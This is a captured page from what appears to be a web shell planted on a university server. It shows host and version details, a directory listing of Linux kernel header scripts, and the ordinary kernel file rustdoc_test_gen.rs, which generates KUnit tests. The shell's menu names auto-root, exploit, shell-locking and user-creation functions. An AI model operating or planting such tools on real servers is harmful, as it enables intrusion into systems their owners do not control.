Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-6.8.0-87-generic /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
atomic
[ DIR ]
drwxr-xr-x
basic
[ DIR ]
drwxr-xr-x
clang-tools
[ DIR ]
drwxr-xr-x
coccinelle
[ DIR ]
drwxr-xr-x
dtc
[ DIR ]
drwxr-xr-x
dummy-tools
[ DIR ]
drwxr-xr-x
gcc-plugins
[ DIR ]
drwxr-xr-x
gdb
[ DIR ]
drwxr-xr-x
genksyms
[ DIR ]
drwxr-xr-x
kconfig
[ DIR ]
drwxr-xr-x
ksymoops
[ DIR ]
drwxr-xr-x
mod
[ DIR ]
drwxr-xr-x
package
[ DIR ]
drwxr-xr-x
selinux
[ DIR ]
drwxr-xr-x
tracing
[ DIR ]
drwxr-xr-x
asn1_compiler
34.25
KB
-rwxr-xr-x
asn1_compiler.c
35.32
KB
-rw-r--r--
as-version.sh
2.03
KB
-rwxr-xr-x
bloat-o-meter
3.77
KB
-rwxr-xr-x
bootgraph.pl
5.64
KB
-rwxr-xr-x
bpf_doc.py
31.73
KB
-rwxr-xr-x
cc-can-link.sh
166
B
-rwxr-xr-x
cc-version.sh
1.36
KB
-rwxr-xr-x
checkdeclares.pl
1.1
KB
-rwxr-xr-x
check_extable.sh
4.93
KB
-rwxr-xr-x
check-git
298
B
-rwxr-xr-x
checkincludes.pl
1.94
KB
-rwxr-xr-x
checkkconfigsymbols.py
15.75
KB
-rwxr-xr-x
checkpatch.pl
233.78
KB
-rwxr-xr-x
checkstack.pl
5.96
KB
-rwxr-xr-x
checksyscalls.sh
7.51
KB
-rwxr-xr-x
check-sysctl-docs
3.66
KB
-rwxr-xr-x
check-uapi.sh
15.05
KB
-rwxr-xr-x
checkversion.pl
2.16
KB
-rwxr-xr-x
cleanfile
3.46
KB
-rwxr-xr-x
cleanpatch
5.06
KB
-rwxr-xr-x
coccicheck
7.9
KB
-rwxr-xr-x
config
4.67
KB
-rwxr-xr-x
const_structs.checkpatch
1.4
KB
-rw-r--r--
decodecode
4.86
KB
-rwxr-xr-x
decode_stacktrace.sh
7.58
KB
-rwxr-xr-x
depmod.sh
697
B
-rwxr-xr-x
dev-needs.sh
6.07
KB
-rwxr-xr-x
diffconfig
4.12
KB
-rwxr-xr-x
documentation-file-ref-check
5.67
KB
-rwxr-xr-x
export_report.pl
4.5
KB
-rwxr-xr-x
extract-ikconfig
1.74
KB
-rwxr-xr-x
extract-module-sig.pl
3.66
KB
-rwxr-xr-x
extract-sys-certs.pl
3.75
KB
-rwxr-xr-x
extract-vmlinux
1.66
KB
-rwxr-xr-x
extract_xc3028.pl
44.62
KB
-rwxr-xr-x
faddr2line
8.63
KB
-rwxr-xr-x
file-size.sh
86
B
-rwxr-xr-x
find-unused-docs.sh
1.27
KB
-rwxr-xr-x
gcc-x86_32-has-stack-protector.sh
405
B
-rwxr-xr-x
gcc-x86_64-has-stack-protector.sh
195
B
-rwxr-xr-x
generate_initcall_order.pl
5.95
KB
-rwxr-xr-x
generate_rust_analyzer.py
5.54
KB
-rwxr-xr-x
generate_rust_target.rs
5.58
KB
-rw-r--r--
gen-randstruct-seed.sh
228
B
-rwxr-xr-x
get_abi.pl
25.36
KB
-rwxr-xr-x
get_dvb_firmware
24.54
KB
-rwxr-xr-x
get_feat.pl
14.61
KB
-rwxr-xr-x
get_maintainer.pl
67.63
KB
-rwxr-xr-x
gfp-translate
2.08
KB
-rwxr-xr-x
git.orderFile
564
B
-rw-r--r--
headerdep.pl
3.5
KB
-rwxr-xr-x
headers_install.sh
2.76
KB
-rwxr-xr-x
head-object-list.txt
1.36
KB
-rw-r--r--
insert-sys-cert
21.46
KB
-rwxr-xr-x
insert-sys-cert.c
13.08
KB
-rw-r--r--
install.sh
986
B
-rwxr-xr-x
jobserver-exec
2.56
KB
-rwxr-xr-x
kallsyms
21.63
KB
-rwxr-xr-x
kallsyms.c
17.75
KB
-rw-r--r--
Kbuild.include
10.1
KB
-rw-r--r--
Kconfig.include
2.65
KB
-rw-r--r--
kernel-doc
77.13
KB
-rwxr-xr-x
ld-version.sh
1.82
KB
-rwxr-xr-x
leaking_addresses.pl
12.84
KB
-rwxr-xr-x
Lindent
502
B
-rwxr-xr-x
link-vmlinux.sh
7.66
KB
-rwxr-xr-x
Makefile
1.87
KB
-rw-r--r--
Makefile.asm-generic
1.82
KB
-rw-r--r--
Makefile.btf
638
B
-rw-r--r--
Makefile.build
17.2
KB
-rw-r--r--
Makefile.clang
1.61
KB
-rw-r--r--
Makefile.clean
1.87
KB
-rw-r--r--
Makefile.compiler
2.74
KB
-rw-r--r--
Makefile.debug
1.12
KB
-rw-r--r--
Makefile.defconf
1.04
KB
-rw-r--r--
Makefile.dtbinst
1.03
KB
-rw-r--r--
Makefile.extrawarn
7.13
KB
-rw-r--r--
Makefile.gcc-plugins
2.59
KB
-rw-r--r--
Makefile.headersinst
2.88
KB
-rw-r--r--
Makefile.host
5.91
KB
-rw-r--r--
Makefile.kasan
2.45
KB
-rw-r--r--
Makefile.kcov
333
B
-rw-r--r--
Makefile.kcsan
1004
B
-rw-r--r--
Makefile.kmsan
208
B
-rw-r--r--
Makefile.lib
21.08
KB
-rw-r--r--
Makefile.modfinal
2.63
KB
-rw-r--r--
Makefile.modinst
4.02
KB
-rw-r--r--
Makefile.modpost
4.69
KB
-rw-r--r--
Makefile.package
8.73
KB
-rw-r--r--
Makefile.randstruct
511
B
-rw-r--r--
Makefile.ubsan
779
B
-rw-r--r--
Makefile.userprogs
1.59
KB
-rw-r--r--
Makefile.vdsoinst
1.15
KB
-rw-r--r--
Makefile.vmlinux
1.48
KB
-rw-r--r--
Makefile.vmlinux_o
3.27
KB
-rw-r--r--
makelst
808
B
-rwxr-xr-x
markup_oops.pl
7.92
KB
-rwxr-xr-x
min-tool-version.sh
630
B
-rwxr-xr-x
misc-check
509
B
-rwxr-xr-x
mkcompile_h
642
B
-rwxr-xr-x
mksysmap
2.08
KB
-rwxr-xr-x
mkuboot.sh
414
B
-rwxr-xr-x
module.lds
615
B
-rw-r--r--
module.lds.S
1.43
KB
-rw-r--r--
modules-check.sh
443
B
-rwxr-xr-x
nsdeps
1.63
KB
-rw-r--r--
objdiff
2.83
KB
-rwxr-xr-x
objdump-func
848
B
-rwxr-xr-x
orc_hash.sh
316
B
-rw-r--r--
pahole-version.sh
269
B
-rwxr-xr-x
parse-maintainers.pl
4.54
KB
-rwxr-xr-x
patch-kernel
9.95
KB
-rwxr-xr-x
profile2linkerlist.pl
414
B
-rwxr-xr-x
prune-kernel
912
B
-rwxr-xr-x
recordmcount.c
17.51
KB
-rw-r--r--
recordmcount.h
19.37
KB
-rw-r--r--
recordmcount.pl
17.34
KB
-rwxr-xr-x
relocs_check.sh
717
B
-rwxr-xr-x
remove-stale-files
1.29
KB
-rwxr-xr-x
rustdoc_test_builder.rs
3.25
KB
-rw-r--r--
rustdoc_test_gen.rs
9.48
KB
-rw-r--r--
rust_is_available_bindgen_libclang.h
91
B
-rw-r--r--
rust_is_available.sh
9.48
KB
-rwxr-xr-x
rust_is_available_test.py
17.7
KB
-rwxr-xr-x
setlocalversion
5.18
KB
-rwxr-xr-x
show_delta
3.04
KB
-rwxr-xr-x
sign-file
25.82
KB
-rwxr-xr-x
sign-file.c
9.93
KB
-rw-r--r--
sorttable
21.26
KB
-rwxr-xr-x
sorttable.c
7.68
KB
-rw-r--r--
sorttable.h
12.99
KB
-rw-r--r--
spdxcheck.py
15.23
KB
-rwxr-xr-x
spdxcheck-test.sh
284
B
-rw-r--r--
spdxexclude
417
B
-rw-r--r--
spelling.txt
34.18
KB
-rw-r--r--
sphinx-pre-install
25.07
KB
-rwxr-xr-x
split-man.pl
604
B
-rwxr-xr-x
stackdelta
1.84
KB
-rwxr-xr-x
stackusage
794
B
-rwxr-xr-x
subarch.include
647
B
-rw-r--r--
syscallhdr.sh
1.89
KB
-rwxr-xr-x
syscallnr.sh
1.45
KB
-rwxr-xr-x
syscalltbl.sh
1.82
KB
-rwxr-xr-x
tags.sh
10.73
KB
-rwxr-xr-x
test_fortify.sh
2.23
KB
-rw-r--r--
tools-support-relr.sh
726
B
-rwxr-xr-x
unifdef.c
34.8
KB
-rw-r--r--
ver_linux
2.59
KB
-rwxr-xr-x
xen-hypercalls.sh
386
B
-rwxr-xr-x
xz_wrap.sh
516
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rustdoc_test_gen.rs
// SPDX-License-Identifier: GPL-2.0 //! Generates KUnit tests from saved `rustdoc`-generated tests. //! //! KUnit passes a context (`struct kunit *`) to each test, which should be forwarded to the other //! KUnit functions and macros. //! //! However, we want to keep this as an implementation detail because: //! //! - Test code should not care about the implementation. //! //! - Documentation looks worse if it needs to carry extra details unrelated to the piece //! being described. //! //! - Test code should be able to define functions and call them, without having to carry //! the context. //! //! - Later on, we may want to be able to test non-kernel code (e.g. `core`, `alloc` or //! third-party crates) which likely use the standard library `assert*!` macros. //! //! For this reason, instead of the passed context, `kunit_get_current_test()` is used instead //! (i.e. `current->kunit_test`). //! //! Note that this means other threads/tasks potentially spawned by a given test, if failing, will //! report the failure in the kernel log but will not fail the actual test. Saving the pointer in //! e.g. a `static` per test does not fully solve the issue either, because currently KUnit does //! not support assertions (only expectations) from other tasks. Thus leave that feature for //! the future, which simplifies the code here too. We could also simply not allow `assert`s in //! other tasks, but that seems overly constraining, and we do want to support them, eventually. use std::{ fs, fs::File, io::{BufWriter, Read, Write}, path::{Path, PathBuf}, }; /// Find the real path to the original file based on the `file` portion of the test name. /// /// `rustdoc` generated `file`s look like `sync_locked_by_rs`. Underscores (except the last one) /// may represent an actual underscore in a directory/file, or a path separator. Thus the actual /// file might be `sync_locked_by.rs`, `sync/locked_by.rs`, `sync_locked/by.rs` or /// `sync/locked/by.rs`. This function walks the file system to determine which is the real one. /// /// This does require that ambiguities do not exist, but that seems fair, especially since this is /// all supposed to be temporary until `rustdoc` gives us proper metadata to build this. If such /// ambiguities are detected, they are diagnosed and the script panics. fn find_real_path<'a>(srctree: &Path, valid_paths: &'a mut Vec<PathBuf>, file: &str) -> &'a str { valid_paths.clear(); let potential_components: Vec<&str> = file.strip_suffix("_rs").unwrap().split('_').collect(); find_candidates(srctree, valid_paths, Path::new(""), &potential_components); fn find_candidates( srctree: &Path, valid_paths: &mut Vec<PathBuf>, prefix: &Path, potential_components: &[&str], ) { // The base case: check whether all the potential components left, joined by underscores, // is a file. let joined_potential_components = potential_components.join("_") + ".rs"; if srctree .join("rust/kernel") .join(prefix) .join(&joined_potential_components) .is_file() { // Avoid `srctree` here in order to keep paths relative to it in the KTAP output. valid_paths.push( Path::new("rust/kernel") .join(prefix) .join(joined_potential_components), ); } // In addition, check whether each component prefix, joined by underscores, is a directory. // If not, there is no need to check for combinations with that prefix. for i in 1..potential_components.len() { let (components_prefix, components_rest) = potential_components.split_at(i); let prefix = prefix.join(components_prefix.join("_")); if srctree.join("rust/kernel").join(&prefix).is_dir() { find_candidates(srctree, valid_paths, &prefix, components_rest); } } } assert!( valid_paths.len() > 0, "No path candidates found. This is likely a bug in the build system, or some files went \ away while compiling." ); if valid_paths.len() > 1 { eprintln!("Several path candidates found:"); for path in valid_paths { eprintln!(" {path:?}"); } panic!( "Several path candidates found, please resolve the ambiguity by renaming a file or \ folder." ); } valid_paths[0].to_str().unwrap() } fn main() { let srctree = std::env::var("srctree").unwrap(); let srctree = Path::new(&srctree); let mut paths = fs::read_dir("rust/test/doctests/kernel") .unwrap() .map(|entry| entry.unwrap().path()) .collect::<Vec<_>>(); // Sort paths. paths.sort(); let mut rust_tests = String::new(); let mut c_test_declarations = String::new(); let mut c_test_cases = String::new(); let mut body = String::new(); let mut last_file = String::new(); let mut number = 0; let mut valid_paths: Vec<PathBuf> = Vec::new(); let mut real_path: &str = ""; for path in paths { // The `name` follows the `{file}_{line}_{number}` pattern (see description in // `scripts/rustdoc_test_builder.rs`). Discard the `number`. let name = path.file_name().unwrap().to_str().unwrap().to_string(); // Extract the `file` and the `line`, discarding the `number`. let (file, line) = name.rsplit_once('_').unwrap().0.rsplit_once('_').unwrap(); // Generate an ID sequence ("test number") for each one in the file. if file == last_file { number += 1; } else { number = 0; last_file = file.to_string(); // Figure out the real path, only once per file. real_path = find_real_path(srctree, &mut valid_paths, file); } // Generate a KUnit name (i.e. test name and C symbol) for this test. // // We avoid the line number, like `rustdoc` does, to make things slightly more stable for // bisection purposes. However, to aid developers in mapping back what test failed, we will // print a diagnostics line in the KTAP report. let kunit_name = format!("rust_doctest_kernel_{file}_{number}"); // Read the test's text contents to dump it below. body.clear(); File::open(path).unwrap().read_to_string(&mut body).unwrap(); // Calculate how many lines before `main` function (including the `main` function line). let body_offset = body .lines() .take_while(|line| !line.contains("fn main() {")) .count() + 1; use std::fmt::Write; write!( rust_tests, r#"/// Generated `{name}` KUnit test case from a Rust documentation test. #[no_mangle] pub extern "C" fn {kunit_name}(__kunit_test: *mut kernel::bindings::kunit) {{ /// Overrides the usual [`assert!`] macro with one that calls KUnit instead. #[allow(unused)] macro_rules! assert {{ ($cond:expr $(,)?) => {{{{ kernel::kunit_assert!("{kunit_name}", "{real_path}", __DOCTEST_ANCHOR - {line}, $cond); }}}} }} /// Overrides the usual [`assert_eq!`] macro with one that calls KUnit instead. #[allow(unused)] macro_rules! assert_eq {{ ($left:expr, $right:expr $(,)?) => {{{{ kernel::kunit_assert_eq!("{kunit_name}", "{real_path}", __DOCTEST_ANCHOR - {line}, $left, $right); }}}} }} // Many tests need the prelude, so provide it by default. #[allow(unused)] use kernel::prelude::*; // Unconditionally print the location of the original doctest (i.e. rather than the location in // the generated file) so that developers can easily map the test back to the source code. // // This information is also printed when assertions fail, but this helps in the successful cases // when the user is running KUnit manually, or when passing `--raw_output` to `kunit.py`. // // This follows the syntax for declaring test metadata in the proposed KTAP v2 spec, which may // be used for the proposed KUnit test attributes API. Thus hopefully this will make migration // easier later on. kernel::kunit::info(format_args!(" # {kunit_name}.location: {real_path}:{line}\n")); /// The anchor where the test code body starts. #[allow(unused)] static __DOCTEST_ANCHOR: i32 = core::line!() as i32 + {body_offset} + 1; {{ {body} main(); }} }} "# ) .unwrap(); write!(c_test_declarations, "void {kunit_name}(struct kunit *);\n").unwrap(); write!(c_test_cases, " KUNIT_CASE({kunit_name}),\n").unwrap(); } let rust_tests = rust_tests.trim(); let c_test_declarations = c_test_declarations.trim(); let c_test_cases = c_test_cases.trim(); write!( BufWriter::new(File::create("rust/doctests_kernel_generated.rs").unwrap()), r#"//! `kernel` crate documentation tests. const __LOG_PREFIX: &[u8] = b"rust_doctests_kernel\0"; {rust_tests} "# ) .unwrap(); write!( BufWriter::new(File::create("rust/doctests_kernel_generated_kunit.c").unwrap()), r#"/* * `kernel` crate documentation tests. */ #include <kunit/test.h> {c_test_declarations} static struct kunit_case test_cases[] = {{ {c_test_cases} {{ }} }}; static struct kunit_suite test_suite = {{ .name = "rust_doctests_kernel", .test_cases = test_cases, }}; kunit_test_suite(test_suite); MODULE_LICENSE("GPL"); "# ) .unwrap(); }
Close